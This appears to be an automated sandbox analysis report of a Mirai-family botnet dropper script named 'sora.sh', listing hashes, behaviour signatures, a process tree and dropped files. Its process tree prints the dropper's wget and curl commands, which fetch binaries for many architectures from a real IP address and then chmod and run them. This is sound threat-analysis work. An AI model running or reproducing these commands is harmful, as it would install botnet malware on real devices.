Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    03-08-2024 05:14

General

  • Target

    sora.sh

  • Size

    2KB

  • MD5

    fe9fcc98f0d2d8350fd699bb3edf3419

  • SHA1

    5480c071e63cc7dd040b18ebc62c4a3cb7d5b5eb

  • SHA256

    faa68fe6ab7972ae17be23f4bed8c482a676935fcf257dca0cc6e51699e16213

  • SHA512

    4994f7fc91e833a29b978f9ddd49657554ba0b4cf4c7e3f6d0d956447c45eb876f85e97644481267b58cd0172d471a0e6da89bba9998d14a22ebf499695d054c

Malware Config

Extracted

Family

mirai

Botnet

SORA

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Contacts a large (43719) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Executes dropped EXE 14 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Changes its process name 1 IoCs
  • Reads runtime system information 35 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 26 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sora.sh
    /tmp/sora.sh
    1⤵
    • Writes file to tmp directory
    PID:709
    • /usr/bin/wget
      wget http://91.92.252.2/bins/sora.x86
      2⤵
      • Writes file to tmp directory
      PID:714
    • /usr/bin/curl
      curl -O http://91.92.252.2/bins/sora.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:735
    • /bin/cat
      cat sora.x86
      2⤵
        PID:739
      • /bin/chmod
        chmod +x robben sora.sh sora.x86 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9
        2⤵
          PID:741
        • /tmp/robben
          ./robben Payload
          2⤵
          • Executes dropped EXE
          PID:742
        • /usr/bin/wget
          wget http://91.92.252.2/bins/sora.mips
          2⤵
          • Writes file to tmp directory
          PID:745
        • /usr/bin/curl
          curl -O http://91.92.252.2/bins/sora.mips
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:786
        • /bin/cat
          cat sora.mips
          2⤵
            PID:787
          • /bin/chmod
            chmod +x robben sora.mips sora.sh sora.x86 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9
            2⤵
              PID:788
            • /tmp/robben
              ./robben Payload
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Changes its process name
              • Reads runtime system information
              PID:789
            • /usr/bin/wget
              wget http://91.92.252.2/bins/sora.x86_64
              2⤵
              • Writes file to tmp directory
              PID:796
            • /usr/bin/curl
              curl -O http://91.92.252.2/bins/sora.x86_64
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:797
            • /bin/cat
              cat sora.x86_64
              2⤵
                PID:798
              • /bin/chmod
                chmod +x robben sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9
                2⤵
                  PID:799
                • /tmp/robben
                  ./robben Payload
                  2⤵
                  • Executes dropped EXE
                  PID:800
                • /usr/bin/wget
                  wget http://91.92.252.2/bins/sora.i468
                  2⤵
                    PID:802
                  • /usr/bin/curl
                    curl -O http://91.92.252.2/bins/sora.i468
                    2⤵
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:803
                  • /bin/cat
                    cat sora.i468
                    2⤵
                      PID:810
                    • /bin/chmod
                      chmod +x robben sora.i468 sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S9
                      2⤵
                        PID:811
                      • /tmp/robben
                        ./robben Payload
                        2⤵
                        • Executes dropped EXE
                        PID:812
                      • /usr/bin/wget
                        wget http://91.92.252.2/bins/sora.i686
                        2⤵
                        • Writes file to tmp directory
                        PID:815
                      • /usr/bin/curl
                        curl -O http://91.92.252.2/bins/sora.i686
                        2⤵
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:822
                      • /bin/cat
                        cat sora.i686
                        2⤵
                          PID:842
                        • /bin/chmod
                          chmod +x robben sora.i468 sora.i686 sora.mips sora.sh sora.x86 sora.x86_64
                          2⤵
                            PID:843
                          • /tmp/robben
                            ./robben Payload
                            2⤵
                            • Executes dropped EXE
                            PID:844
                          • /usr/bin/wget
                            wget http://91.92.252.2/bins/sora.mpsl
                            2⤵
                            • Writes file to tmp directory
                            PID:846
                          • /usr/bin/curl
                            curl -O http://91.92.252.2/bins/sora.mpsl
                            2⤵
                            • Reads runtime system information
                            • Writes file to tmp directory
                            PID:847
                          • /bin/cat
                            cat sora.mpsl
                            2⤵
                              PID:848
                            • /bin/chmod
                              chmod +x robben sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64
                              2⤵
                                PID:849
                              • /tmp/robben
                                ./robben Payload
                                2⤵
                                • Executes dropped EXE
                                PID:850
                              • /usr/bin/wget
                                wget http://91.92.252.2/bins/sora.arm4
                                2⤵
                                  PID:852
                                • /usr/bin/curl
                                  curl -O http://91.92.252.2/bins/sora.arm4
                                  2⤵
                                  • Reads runtime system information
                                  • Writes file to tmp directory
                                  PID:853
                                • /bin/cat
                                  cat sora.arm4
                                  2⤵
                                    PID:854
                                  • /bin/chmod
                                    chmod +x robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64
                                    2⤵
                                      PID:855
                                    • /tmp/robben
                                      ./robben Payload
                                      2⤵
                                      • Executes dropped EXE
                                      PID:856
                                    • /usr/bin/wget
                                      wget http://91.92.252.2/bins/sora.arm5
                                      2⤵
                                      • Writes file to tmp directory
                                      PID:857
                                    • /usr/bin/curl
                                      curl -O http://91.92.252.2/bins/sora.arm5
                                      2⤵
                                      • Reads runtime system information
                                      • Writes file to tmp directory
                                      PID:858
                                    • /bin/cat
                                      cat sora.arm5
                                      2⤵
                                        PID:859
                                      • /bin/chmod
                                        chmod +x robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64
                                        2⤵
                                          PID:860
                                        • /tmp/robben
                                          ./robben Payload
                                          2⤵
                                          • Executes dropped EXE
                                          PID:861
                                        • /usr/bin/wget
                                          wget http://91.92.252.2/bins/sora.arm6
                                          2⤵
                                          • Writes file to tmp directory
                                          PID:863
                                        • /usr/bin/curl
                                          curl -O http://91.92.252.2/bins/sora.arm6
                                          2⤵
                                          • Reads runtime system information
                                          • Writes file to tmp directory
                                          PID:864
                                        • /bin/cat
                                          cat sora.arm6
                                          2⤵
                                            PID:865
                                          • /bin/chmod
                                            chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64
                                            2⤵
                                              PID:866
                                            • /tmp/robben
                                              ./robben Payload
                                              2⤵
                                              • Executes dropped EXE
                                              PID:867
                                            • /usr/bin/wget
                                              wget http://91.92.252.2/bins/sora.arm7
                                              2⤵
                                              • Writes file to tmp directory
                                              PID:869
                                            • /usr/bin/curl
                                              curl -O http://91.92.252.2/bins/sora.arm7
                                              2⤵
                                              • Reads runtime system information
                                              • Writes file to tmp directory
                                              PID:870
                                            • /bin/cat
                                              cat sora.arm7
                                              2⤵
                                                PID:871
                                              • /bin/chmod
                                                chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64
                                                2⤵
                                                  PID:872
                                                • /tmp/robben
                                                  ./robben Payload
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:873
                                                • /usr/bin/wget
                                                  wget http://91.92.252.2/bins/sora.ppc
                                                  2⤵
                                                  • Writes file to tmp directory
                                                  PID:875
                                                • /usr/bin/curl
                                                  curl -O http://91.92.252.2/bins/sora.ppc
                                                  2⤵
                                                  • Reads runtime system information
                                                  • Writes file to tmp directory
                                                  PID:876
                                                • /bin/cat
                                                  cat sora.ppc
                                                  2⤵
                                                    PID:877
                                                  • /bin/chmod
                                                    chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 sora.x86_64
                                                    2⤵
                                                      PID:878
                                                    • /tmp/robben
                                                      ./robben Payload
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:879
                                                    • /usr/bin/wget
                                                      wget http://91.92.252.2/bins/sora.ppc440fp
                                                      2⤵
                                                        PID:881
                                                      • /usr/bin/curl
                                                        curl -O http://91.92.252.2/bins/sora.ppc440fp
                                                        2⤵
                                                        • Reads runtime system information
                                                        • Writes file to tmp directory
                                                        PID:882
                                                      • /bin/cat
                                                        cat sora.ppc440fp
                                                        2⤵
                                                          PID:883
                                                        • /bin/chmod
                                                          chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_64
                                                          2⤵
                                                            PID:884
                                                          • /tmp/robben
                                                            ./robben Payload
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:885
                                                          • /usr/bin/wget
                                                            wget http://91.92.252.2/bins/sora.m68k
                                                            2⤵
                                                            • Writes file to tmp directory
                                                            PID:886
                                                          • /usr/bin/curl
                                                            curl -O http://91.92.252.2/bins/sora.m68k
                                                            2⤵
                                                            • Reads runtime system information
                                                            • Writes file to tmp directory
                                                            PID:887
                                                          • /bin/cat
                                                            cat sora.m68k
                                                            2⤵
                                                              PID:888
                                                            • /bin/chmod
                                                              chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_64
                                                              2⤵
                                                                PID:889
                                                              • /tmp/robben
                                                                ./robben Payload
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:890
                                                              • /usr/bin/wget
                                                                wget http://91.92.252.2/bins/sora.sh4
                                                                2⤵
                                                                • Writes file to tmp directory
                                                                PID:892
                                                              • /usr/bin/curl
                                                                curl -O http://91.92.252.2/bins/sora.sh4
                                                                2⤵
                                                                • Reads runtime system information
                                                                • Writes file to tmp directory
                                                                PID:893
                                                              • /bin/cat
                                                                cat sora.sh4
                                                                2⤵
                                                                  PID:894
                                                                • /bin/chmod
                                                                  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.sh4 sora.x86 sora.x86_64
                                                                  2⤵
                                                                    PID:895
                                                                  • /tmp/robben
                                                                    ./robben Payload
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:896

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • /tmp/robben

                                                                  Filesize

                                                                  27KB

                                                                  MD5

                                                                  545cc0b3e5dae8244debe55a41e14a9f

                                                                  SHA1

                                                                  101ad459b5b114c0a79c458cd0c0d2374a3698a1

                                                                  SHA256

                                                                  a916866d96e7215899fb4387c14b52725ec83de463dd0302c8cc72b8cade2d91

                                                                  SHA512

                                                                  1e90d63777c07e490540fe00f41a2f50d157c0e2b7c979204e8fc5a9775cbdd21a7e317290c82c552897cdb30320a08d1ca705e33e1d947e837ff14e6ca56611

                                                                • /tmp/robben

                                                                  Filesize

                                                                  28KB

                                                                  MD5

                                                                  8d068eba527935d34fbff880f4cf7530

                                                                  SHA1

                                                                  82f50f55fb025735b62fca14362600132b21c2d0

                                                                  SHA256

                                                                  bce45bca1f30fecce6ce8bf4c4dfcc1c9c19517144398aa91b9a63c01995c147

                                                                  SHA512

                                                                  6cc29217a507b4072469b11f63a8da070a70e4228a36a0ea612f905789ca0f829c47bd290d9c09024bfe88c7e28fff8d430e9e9def5a6124b90cedb49f029c14

                                                                • /tmp/robben

                                                                  Filesize

                                                                  28KB

                                                                  MD5

                                                                  fa8042bc292cb4403494d779833de7ca

                                                                  SHA1

                                                                  a78431e9ef2fac7f3a909c06a81e643369a17ee4

                                                                  SHA256

                                                                  1ec5ec93f91f140dbdfbb8a3f79828be32737673e60b6b8999d3a5c520a1b5f5

                                                                  SHA512

                                                                  fe9e309c7b18a1c25d10d418cea499a1385f4c227fb5a64e491b1ca3d5819a5677f80280194b4dcc2aa7cc69aa6b7c1775a3cd54143f45aed0dc0ddcb199de82

                                                                • /tmp/robben

                                                                  Filesize

                                                                  212B

                                                                  MD5

                                                                  83ab6cd9a67528bbc6f4f360cb7f8d83

                                                                  SHA1

                                                                  07e8f17209e0569aab39f062568ff0090d9b20d4

                                                                  SHA256

                                                                  3ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435

                                                                  SHA512

                                                                  171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f

                                                                • /tmp/robben

                                                                  Filesize

                                                                  28KB

                                                                  MD5

                                                                  a9d839dd97abb474595bc7e18157aa64

                                                                  SHA1

                                                                  82c1ec7eae6dd1bc7dcfd1e89911d328c899c885

                                                                  SHA256

                                                                  3bb3ff14162d0b66a51f448e8ff9e9018aa0040941de829f8748911b4471d90d

                                                                  SHA512

                                                                  4311ce9b061bf6f01b3b004eb0c0b14a4fb86b1a11c040fd8b633c3a3a27821c74775a4eeec82d22e8eacddbc35736814800dcf9dbca85218f189fda4b1d8993

                                                                • /tmp/robben

                                                                  Filesize

                                                                  64KB

                                                                  MD5

                                                                  5092e7b4c0b2e9e418ca596ddad29165

                                                                  SHA1

                                                                  41edb1d01dcd2bacfd437cad4af32791e473e1c0

                                                                  SHA256

                                                                  43c3fe213b5a161348b2036c0bdf95b5c72d48d55ed3e2557a91a078de5bb845

                                                                  SHA512

                                                                  d4004f22ad4142cef16dd5dea79598b69b94667dac47affaee45f7a16c64ee859654930315d1cec9aaf374f1d62a1c34239f8a8b42f41855f353ffd6d773e742

                                                                • memory/789-1-0x00400000-0x00455b00-memory.dmp